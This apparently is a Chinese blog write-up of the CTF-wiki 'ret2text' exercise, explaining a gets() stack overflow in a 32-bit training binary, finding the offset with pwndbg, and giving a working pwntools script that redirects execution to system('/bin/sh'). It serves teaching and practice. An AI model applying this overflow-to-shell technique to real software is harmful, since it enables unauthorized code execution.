pwn基本ROP——ret2text

最新推荐文章于 2024-11-10 12:22:23 发布
原创 最新推荐文章于 2024-11-10 12:22:23 发布 · 1.1k 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全

本文详细介绍了ret2text环境下的漏洞分析及利用技巧。通过checksec指令检查文件保护措施,发现仅开启NX保护。利用IDA调试,找到可以控制返回地址的secure函数,内含system(/bin/sh)。通过填充栈空间并利用pwndbg获取偏移量,构造payload实现提权。最终,使用pwntools生成payload,成功控制程序执行system函数,达到提权目的。

ret2text

环境

ret2text

原理

控制主函数的return返回到文件函数中自带的system函数的地址,从而获得最高权限

漏洞分析

利用checksec [file_name]指令获取可执行文件的保护措施开放情况

在这里插入图片描述
命令:

checksec ret2text

可以看到,该可执行文件是32位的,仅开启了NX堆栈不可执行保护。
也就是说,我们无法通过在栈中插入shellcode来让系统运行这段恶意代码。

利用IDA32位进行调试

用IDA打开ret2text文件后,找到main主函数直接按Tab进行反汇编
反汇编结果如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+1Ch] [ebp-64h] BYREF

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("There is something amazing here, do you know anything?");
  gets(s);
  printf("Maybe I will tell you next time !");
  return 0;
}

在这里我们看到了危险函数gets(),由于gets()函数不对输入数据的边界作限制,我们可以输入任意长度的字符来对栈中数据进行控制。

这时我们点击旁边的函数栏查看函数信息,发现有个secure函数,该函数反汇编结果如下

void secure()
{
  unsigned int v0; // eax
  int input; // [esp+18h] [ebp-10h] BYREF
  int secretcode; // [esp+1Ch] [ebp-Ch]

  v0 = time(0);
  srand(v0);
  secretcode = rand();
  __isoc99_scanf(&unk_8048760, &input);
  if ( input == secretcode )
    system("/bin/sh");
}

可见此函数自带system("/bin/sh")函数,我们直接将主函数返回到system函数的地址即可直接提权

先回到主函数,gets()函数将输入内容存入s数组,根据char s[100]右边的注释我们可以知道s数组从ebp-0x64开始,由于这是32位编码,ebp也占了8个字节,所以return返回的地址在栈中位置为s数组起始位置+0x6c

我们只要输入0x6c个字节填充,然后再输入system("/bin/sh")的位置即可成功将return 0变为return system.addr成功执行提权。

这里我们填充的字符可任意选择,因为此时我们并不关心ebp的值,我们运行到system函数就已经达到了我们的目的而不必关心后续程序如何运行。

为了获取system函数的地址,我们在secure函数中再次按Tab返回汇编语言,再按空格进入.text程序代码段,找到system函数地址
在这里插入图片描述
要注意这里必须用0x0804863a这个地址,因为在执行函数之前也需要将参数传入。

利用pwndbg获取偏移量

我们也可以使用gdb的插件pwndbg来获取return偏移量,方法如下
这里pwndbg需要自行下载
首先在命令行输入gdb ret2text进入pwndbg
再输入cyclic xxx来获取xxx个随机字符,这道题我们使用200个随机字符即可
在这里插入图片描述
然后复制这些字符,继续输入r运行
粘贴这些字符
在这里插入图片描述
可以看到弹出Invalid address 0x62616164
我们输入cyclic -l 0x62616164即可获得对应的偏移量
在这里插入图片描述

payload

from pwn import *
 
io = process('./ret2text')
secure_addr = p32(0x804863A)
 
payload = bytes('a' * 112,'utf-8') + secure_addr

io.sendline(payload)

io.interactive()

编写payload时使用pwntools更方便
关于pwntools的用法可在这里学习

这里的payload就是先用字符’a’填充112(0x6C)个字节,这112个字节中有8个字节是存储ebp的栈空间,剩余的字节是s数组所分配的栈空间,secure_addr占用的则是return的栈空间。

利用此payload后main函数栈空间如下

地址栈中信息
ebp-0x64a
a
ebp-1a
ebpaaaa
ebp+8(return)secure_addr
pwn ret2text
young‘s blog
02-06 1627
好久没有写博客了,今天记录一下做ctf-wiki上ret2text的过程,也记录一下学到的东西,一点一点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行一下程序,看看程序都有什么功能。 测试后得知只有一个输入点。 拖进ida分析一下...
PWN初体验之ret2text
weixin_43137410的博客
08-04 859
"Hello,World!"的浪漫可能只有直男才懂!
基础ROP之:ret2textret2libc,ret2syscall,ret2shellcode
WdIg-2023的博客
01-30 1995
在上一篇文章中学习了gdb和pwntools的基本使用后,这篇文章来带领大家入门pwn,包括:ret2textret2libc,ret2syscall,ret2shellcode。
pwn自学笔记(1)--——ret2text
CDU__mint__的博客
10-05 2173
此篇文章是对ret2text的学习初步总结。目标利用栈溢出执行危险程序获取shell。
pwn笔记 - ret2text - 函数传参(x86&x64)
weixin_44227244的博客
09-06 4973
pwn笔记 - ret2text - 函数传参
pwn栈溢出学习 基本ROP——ret2text
MrTreebook的博客
10-31 503
CTFWiki 栈溢出 ret2text 目录CTFWiki 栈溢出 ret2text1.checksec跑一下2.IDA pro看一下2.1 计算s相对ebp的偏移量2.2 看一下system函数3.gdb动态调试获取覆盖数据大小4.编写exp 1.checksec跑一下 NX enable :栈不可执行 对于这个题目来说执不执行都无所谓 2.IDA pro看一下 2.1 计算s相对ebp的偏移量 看到一个危险函数 gets() 看到[esp + 1ch] [ebp - 64h] 这个时候我们要
pwn栈溢出学习 基本ROP——ret2syscall
MrTreebook的博客
11-28 1385
pwn栈溢出学习 基本ROP——ret2syscall1.实验程序2.gcc编译3.用pwndgb或peda计算溢出长度4.通过ROPgadget这个工具来获取指令的位置5.exp 1.实验程序 #include <stdio.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #include <sys/syscall.h> void exploit() {
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1433
肾么叫做万死不辞呀,就是每天被气死一万次,也不辞职…(哭哭
[PWN][进阶篇]Rop-Ret2Text介绍及实例教学
网络安全知识分享
03-22 6580
Rop-Ret2Text介绍及实例教学1、前提知识2、实例教学 1、前提知识 什么是Rop系统攻击 是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP也有其不同于正常程序的内在特征: (1)ROP控制流中,call和ret指令不操纵函数,而是用于将函数里面的短指令序列的执行流串起来,但在正常的程序中,call和ret分别代表函数的开始和结束; (2)ROP控制流中,jmp指令在不同的库函数甚至不同的库之间跳转,攻击者抽取的指令序列可能取自任意一个二进制文件
CTF(Pwn) Rop + ret2libc 题型 常规解法思路 (初级)
半岛铁盒的博客
03-22 1341
引子 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。 之所以称之为 ROP,是因为核心在于利用了指令
pwn ,ret2text
amber_o0k的博客
07-28 340
直接gdb ret2text,然后start进调试模式 用gdb自带命令,pattern create 200,生成一个200个字符的字符串,后面会用到。 用gdb自带命令,pattern create 200,生成一个200个字符的字符串 单走一个r,让程序跑起来 ,且程序会让你输入,把字符串怼进去 然后程序就会报错了,EIP显示的字符就是程序即将执行的字符,需要将这个字符替换为想要执行的函数的地址。 用gdb自带的命令数一下在“AA8A”之前还有多少个字符...
PWN ret2text
prettyX的博客
11-21 1063
今天跟着B站UP学习了ROP,向UP表示感谢。 0X01 什么是ROP ROP就是shellcode的一种特殊写法。ROP技术就是不需要自己动手写shellcode,只是利用文件中给出的多个跳转指令,实现利用原有代码达到获取shell的目的。 0X02 ROP使用的地方 1、当程序开启了NX保护机制;NX策略是使栈区域的代码无法执行,但我们可以使用RO...
pwn小白入门03---ret2text
weixin_45943522的博客
02-21 6903
什么是栈溢出: 栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的栈中的变量的值被改变(比如gets函数,他不会去验证你输入的值的长度,通过这个函数,你可以往一个本身大小为4字节的数组中填入任意大小的数据,如果填入8字节的数据,将会导致栈溢出,进而程序报错)。就像是往杯子里倒水,水满了溢出来最后烫到你一样。 最简单的栈溢出利用:ret2text 通过栈溢出修改call指令保存在栈上的返回地址(eip的值),这样cpu执行ret指令的时候,就会将被修改的值从栈上取
基本ROPret2text
至臻求学,胸怀云月
01-12 1489
(IDA分析存在错误,抠了一天终于在大佬的帮助下抠出来了) 背景 当程序开启NX保护之后,直接向栈或堆上注入代码的方式难以发挥效果(数据页不执行操作) 提出绕过操作: ROP(Return Oriented Programming) 主要思想是:在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets),来改变寄存器或者变量的值,从而控制程序的执行流程。 所谓 gadgets 就是以 ret...
ret2text
m0_54262894的博客
10-28 386
最近攻防世界和BUUCTF中剩下我没做过的题目已经对于我来说有些困难了 所以我在CTF wiki 里开始学习,顺便再巩固一下基础 这里是原文 老样子,先checksec 放入ida中查看 main函数 发现了gets这个危险函数,接着往下看 用Shift+F12查看 发现了/bin/sh 这里你会看到有两个/bin/sh,但我们需要的是text中的地址 记住 text 中 /bin/sh 的地址0x804863A ...
PWN入门(三)——ret2text /ret2syscall /ret2shellcode
最新发布
Jack_Grealish的博客
11-10 2128
根据目录看文章结构,优快云中没有Typora那么多级标题,所以有点乱。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值